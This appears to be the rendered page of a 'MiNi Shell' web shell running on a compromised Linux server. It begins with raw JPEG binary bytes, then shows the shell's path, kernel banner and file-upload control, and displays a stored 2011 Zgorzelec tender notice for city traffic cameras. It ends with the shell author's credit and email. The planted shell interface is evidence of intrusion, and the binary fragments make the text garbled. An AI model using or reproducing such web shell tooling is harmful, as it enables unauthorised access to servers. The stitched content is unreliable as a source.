JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111215/331379-N-2011.html

<p class="kh_header"><b>Zgorzelec: Dostosowanie infrastruktury Urzędu Miasta Zgorzelec dla potrzeb społeczeństwa informacyjnego -  
e-podróżnik (punkty akwizycji obrazu)</b><br>
<b>Numer ogłoszenia: 331379 - 2011; data zamieszczenia: 15.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostosowanie infrastruktury Urzędu Miasta Zgorzelec dla potrzeb społeczeństwa informacyjnego -  
e-podróżnik (punkty akwizycji obrazu).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa wraz z montażem oraz uruchomieniem systemu                              
    punktów akwizycji obrazu, w miejscach o których mowa w punkcie 3.3 SIWZ. 

2. Wykonawca zobowiązany będzie utrzymać i serwisować system punktów akwizycji 
    obrazu wraz z ponoszeniem opłat za transmisję danych przez okres 36 miesięcy, od dnia  
    podpisania protokołu obioru z klauzulą odbieram. 

3. Lokalizacja punktów akwizycji obrazu:
    1) Latarnia - Rondo im Solidarności, 
    2) Latarnia - Rondo im. 1 Pułku Chemicznego, 
    3) Budynek Urzędu Miasta Zgorzelec - ul. Domańskiego 7. 
    
4. Wdrożony system ma zapewnić monitorowanie najbardziej newralgicznych 
    komunikacyjnie miejsc w mieście. System za pomocą kamer umieszczonych 
    w miejscach charakteryzujących się częstym występowaniem korków i kolizji drogowych 
    ma na celu zwiększenie bezpieczeństwa  mieszkańców miasta. 
    Kamery umożliwią prowadzenie zdalnego nadzoru nad głównymi komunikacyjnie 
    punktami miasta z jednego miejsca, jak również będą  pomocne do szybkiej oceny 
    sytuacji na ulicach, rondach, skrzyżowaniach i ułatwią  komunikację. 

5. Oferowane urządzenia zastosowane dla zapewnienia działania systemu muszą być 
    fabrycznie  nowe, w pełni sprawne, wyprodukowane nie później niż w 2011r. 

6. Szczegółowy opis przedmiotu zamówienia wraz z opisem wymagań systemu,  ich 
    minimalnych parametrów technicznych oraz wymaganą ilością kamer w poszczególnych 
    punktach  monitoringu, zostały zawarte w załączniku nr 7 do SIWZ. 

7. Zamawiający wymaga by Wykonawca zapewnił działanie systemu przez okres 36 
    miesięcy.

8. Wykonawca zobowiązany jest do:
a)	zapewnienia działania systemu całodobowo,  umiejscowionego na serwerze Wykonawcy     o wymaganiach i funkcjonalności zgodnie ze szczegółowym opisem przedmiotu  zamówienia, zawartym w załączniku nr 7 do SIWZ, 
b)	zgrupowania obrazu z kamer na 1 stronie www, 
c)	dostarczenia, zainstalowania i uruchomienia systemu, w punktach akwizycji obrazu,               o których mowa w punkcie 3.
       
9. Wykonawca zobowiązany jest do usunięcia:
1)	usterek uniemożliwiających korzystanie z systemu m.in. braku dostępności systemu on-line, w ciągu 24 godzin od ich zgłoszenia przez administratora, e mail lub faksem,   
2)	innych błędów powodujących nieprawidłowe działanie systemu lub uniemożliwiających wykorzystanie pełnej funkcjonalności systemu, w terminie 5 dni roboczych. 

10. Zobowiązuje się Wykonawcę do uzyskania wszelkich zezwoleń i uzgodnień 
      wymaganych  przepisami prawa przy instalacji systemu. 

11. Koszty transportu i rozładunku do punktów akwizycji obrazu, o których mowa  w 
      punkcie 3 ponosi Wykonawca.  

12. Zamawiający wymaga wykonania przez Wykonawcę dokumentacji powykonawczej
      składającej się z :
      1) zestawienia kamer wraz z nr seryjnymi oraz danymi dostępowymi (hasła, login),     
      2) instrukcji obsługi kamer i sprzętu towarzyszącego, 
      3) pisemnych gwarancji jakości na urządzenia wchodzące w skład systemu, 
      4) adresu strony www gdzie zostanie wyświetlony obraz z kamer dostępny dla każdego
          użytkownika Internetu.
                   
13. Odbiór sprzętu nastąpi na podstawie protokołu odbioru z klauzulą odbieram 
      podpisanego odpowiednio przez przedstawiciela Zamawiającego i Wykonawcę. 

14. Zamawiający wymaga gwarancji jakości na okres 36 miesięcy na: 
1)	oferowany sprzęt, 
2)	system akwizycji obrazu.

15. Wykonawca odpowiada za  wady fizyczne, ujawnione w dostarczonych urządzeniach 
      wchodzących  w skład systemu  i ponosi  z tego tytułu wszelkie zobowiązania.                
      Okres gwarancji jakości będzie liczony od dnia podpisania protokołu odbioru        
      przedmiotu zamówienia z klauzulą odbieram, podpisanego odpowiednio przez 
      przedstawiciela  Zamawiającego i  Wykonawcę.          

16. Zgodnie z art. 30 ust. 1 ustawy Pzp, Zamawiający opisał przedmiot zamówienia za 
      pomocą cech technicznych i jakościowych, poprzez wyspecyfikowanie  parametrów 
      technicznych poszczególnych rodzajów urządzeń. 
      Opisane przez Zamawiającego parametry techniczne, jakościowe i funkcjonalne 
      zamawianych urządzeń,  zostały określone jako minimalne, Wykonawca może 
      zaoferować urządzenia o lepszych parametrach technicznych, jakościowych i 
      funkcjonalnych.      
      Zamawiający dopuszcza oferowanie urządzeń równoważnych. 
      Zgodnie z art. 30 ust. 5 ustawy Pzp, Wykonawca jest zobowiązany wykazać, iż 
      oferowane przez niego urządzenia spełniają minimalne wymagania określone przez 
      Zamawiającego, zarówno pod względem parametrów technicznych jak i jakościowych. 
      W takim przypadku Wykonawca musi załączyć do oferty stosowne dokumenty tych 
      urządzeń, aby Zamawiający mógł ocenić czy odpowiadają one wymaganiom 
      postawionym w SIWZ.  
      Zaoferowane urządzenia równoważne muszą odpowiadać co do jakości wymogom  
      urządzeń opisanych w załączniku nr 7 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.12.53.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, iż w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
okresie, zrealizował trzy dostawy wraz z instalacją systemu akwizycji obrazu o łącznej wartości brutto 60 000,00 zł. 

Ocena spełnienia powyższego warunku dokonana zostanie w oparciu o analizę                                                              przedłożonych przez Wykonawcę dokumentów i oświadczeń,  z treści których wynikać            będą informacje potwierdzające spełnienie w/w warunku.     
Nie wykazanie w wystarczający sposób potwierdzenia spełnia powyższego warunku             spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności 
określonych w art. 26 ust. 3 ustawy Prawo zamówień publicznych.  

Zamawiający informuje, iż w przypadku gdy Wykonawca przedstawi w wykazie dostaw, prace wyrażone w innej walucie niż PLN, Zamawiający do oceny spełniania warunku przyjmie średni kurs tej waluty w stosunku do PLN publikowany przez NBP z dnia publikacji ogłoszenia               o niniejszym zamówieniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi złożyć następujące dokumenty, pod rygorem odrzucenia    
      oferty zgodnie z art.. 89 ust. 1  pkt. 2, z zastrzeżeniem art. 87 ust. 2 pkt.3 ustawy Prawo 
      zamówień publicznych. 

     1)  wypełniony i podpisany formularz Oferta  - Załącznik nr 1 do SIWZ,        
    
     2)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
          zamówień   publicznych - załącznik nr 2 do SIWZ.
          Powyższe oświadczenie, Wykonawca składa w przypadku gdy  zamierza 
          powierzyć do wykonania  części zamówienia.  
          W przypadku nie dołączenia do oferty powyższego formularza, bądź jego nie 
          wypełnienia Zamawiający uzna, iż Wykonawca wykona zamówienie własnymi  
          siłami.       
   
    3)  wypełniony i podpisany załącznik Nr 7 do SIWZ Szczegółowy opis przedmiotu 
          zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość dokonania  zmian postanowień zawartej Umowy,   przy czym warunki takiej zmiany Zamawiający określił  w § 11 ust. 2  projektu umowy. 

1. Zakres przewidzianych zmian: 

    1) termin określony w pkt. 4 SIWZ i § 3 ust. 1 projektu umowy  ulegnie  przesunięciu w 
        przypadku wystąpienia opóźnień wynikających z:  
        a) opóźnień zawinionych przez Zamawiającego, mających wpływ na termin realizacji 
            przedmiotu umowy, w przypadku nie udostępnienia lokalizacji punktów 
            akwizycji obrazu celem instalacji,  
        b) z przyczyn losowych, w przypadku wystąpienia działania siły wyższej tj. zdarzenie 
            nadzwyczajne, zewnętrzne, nie możliwe do przewidzenia i przeciwdziałania, 
            uniemożliwiające wykonanie zobowiązań wynikajacych z umowy,  
        
    2) Zmiana osób wskazanych w projekcie umowy z imienia i nazwiska 
        odpowiedzialnych za realizację umowy, o których mowa w § 10 ust. 1 i 2 projektu 
        umowy, będzie możliwa w  każdym czasie  w trakcie związania umową.    

  
   3)  Zmiana Podwykonawcy możliwa będzie jedynie wtedy, gdy zakres realizowanych 
        przez Podwykonawcę części zamówienia, nie ulegnie zmianie w stosunku do zakresu 
        wskazanego w ofercie Wykonawcy, a które zaplanował on do realizacji przez 
        Podwykonawcę. 
        Zmiana taka możliwa będzie jedynie na uzasadniony  wniosek Wykonawcy, do 
        którego winien załączyć projekt umowy z Podwykonawcą, przy czym wymagana jest 
        w tym przypadku pisemna zgoda Zamawiającego na zawarcie przez Wykonawcę 
        umowy z innym Podwykonawcą. 

2. W przedstawionych w punkcie 1 podpunkt 1 przypadkach wystąpienia opóźnień, 
    strony ustalają nowe terminy realizacji umowy, z tym, że okres  przesunięcia terminu 
    realizacji przedmiotu umowy równy będzie co najmniej okresowi przerwy lub 
    postoju. 

3. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych 
    okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą ze stron 
    umowy. 

4. Strona ubiegająca się o zmianę umowy w w/w przypadkach, powinna zwrócić się do  
    Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
    zmian  w umowie aneksem, w terminie  7 dni od daty zdarzenia uzasadnionego 
    zmianą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2011 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
               59-900 Zgorzelec 
               ul.  Domańskiego 7
               Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com